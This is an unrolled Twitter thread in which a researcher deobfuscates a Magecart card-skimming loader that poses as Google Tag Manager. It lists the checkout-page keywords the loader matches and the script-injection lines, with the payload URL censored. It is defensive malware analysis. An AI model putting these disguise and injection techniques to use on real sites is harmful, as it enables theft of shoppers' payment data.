,
10 tweets,
3 min read
Read on Twitter
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -
Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website: gist.github.com/krautface/e0f8…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
Lines 3-14 in the prettified version look like they're doing something. If you look at Line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag, it's just never used
Line 15-18 there's a bunch of meaningless variable names, like in the other version: keyProc, innerMeta, optEmbed, and a function called pickFooter, which is actually what is used to turn the values in innerMeta into short snippets of text to match against the current URL path.
Lines 31-38 are setting up some variables that will be used to construct the actual script tag. They call the deobfuscation function pickFooter with an argument of 'pxwe8al23pjj', which is just used to XOR the values. The results: 
Finally, lines 39-46 are looping through the values in innerMeta to see if the current URL path contains them. The values it's looking for: onestepcheckout, checkout, onepage, onestep, firecheckout, securecheckout, idecheckoutvm, oscheckout, pagamento, odeme, fechar-compra
On line 40, it's checking to see if the string position of any of those in the URL is not equal to optEmbed. optEmbed is set to -1, so this is just standard way of checking if a string exists in another string. If it does, that call will return 0 or more.
Line 42 cleaned up: keyProc = document['createElement']('script')
Line 43 cleaned up: keyProc['setAttribute']('src', 'sorry-had-to-remove-this')
Line 44 cleaned up: head['appendChild'](keyProc)
(apologies for the censoring, but this isn't my intel to share freely)
Line 43 cleaned up: keyProc['setAttribute']('src', 'sorry-had-to-remove-this')
Line 44 cleaned up: head['appendChild'](keyProc)
(apologies for the censoring, but this isn't my intel to share freely)
Lastly, here's a version of the loader with all the extraneous stuff removed. Debugger on line 44 stops the execution and you can see the keyProc variable is a script tag (with an empty src) by running console.log(keyProc) gist.github.com/krautface/93ff…
To clarify one thing: this is a loader used by the same skimming group as the Google Analytics one, but there are numerous other ones. If you see some JS with similar characteristics (especially the long array of obfuscated strings and the for loop) it's likely the same group.
